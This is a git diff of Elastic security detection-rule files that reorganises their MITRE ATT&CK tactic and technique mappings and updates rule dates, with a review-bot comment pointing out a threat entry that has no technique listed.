a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 20edb1bd2e4..6d1c96172e8 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2024/05/21" [rule] author = ["Elastic"] @@ -52,54 +52,43 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" - [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" + + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" 
diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml
index 1a9f0d9f598..9eb28e15955 100644
--- a/rules_building_block/defense_evasion_service_path_registry.toml
+++ b/rules_building_block/defense_evasion_service_path_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/24"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -51,41 +51,48 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml index 872bb66c215..5a13a3271d6 100644 --- a/rules_building_block/defense_evasion_services_exe_path.toml +++ b/rules_building_block/defense_evasion_services_exe_path.toml 
@@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -48,41 +48,48 @@ process where event.type == "start" and process.name : "sc.exe" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.011" -name = "Services Registry Permissions Weakness" -reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml index 06b0a02191a..e4a2ed6fd5e 100644 
--- a/rules_building_block/persistence_iam_instance_request_to_iam_service.toml +++ b/rules_building_block/persistence_iam_instance_request_to_iam_service.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/07/24" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2024/11/07" [rule] author = ["Elastic"] @@ -84,22 +84,20 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" @@ -110,7 +108,17 @@ id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + From 3f775ca8fa82d4f68232daecd1beec8967dedef5 Mon Sep 17 00:00:00 2001 From: terrancedejesus Date: Wed, 25 Mar 2026 13:39:37 -0400 Subject: [PATCH 16/16] updating azure & o365 dates --- .../discovery_storage_blob_container_access_modification.toml | 2 +- .../azure/impact_resources_resource_group_deletion.toml | 2 +- .../o365/credential_access_identity_user_account_lockouts.toml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) 
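Review bot: The new `[[rule.threat]]` entry added in the -110,7 hunk carries `framework` and a `[rule.threat.tactic]` of `TA0004` but no `[[rule.threat.technique]]` table, unlike every other entry this series adds, which repeats the techniques under the extra tactic. If the rule schema requires at least one technique per threat entry this file will fail to load; if it does not, the Privilege Escalation mapping is left without `T1078.004` or the `T1098.x` sub-techniques, which is presumably the association intended. Repeating the relevant `[[rule.threat.technique]]` tables from the Persistence entry above (that entry starts outside this hunk) would match the pattern used elsewhere in the series.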
diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
index 574b980395c..ea718167fd4 100644
--- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
+++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/20"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml
index cc81e8e2578..50b60fce964 100644
--- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml
+++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/08/17"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml
index 5f1cc7fac8e..0f2f0e73253 100644
--- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml
+++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/10"
 integration = ["o365"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]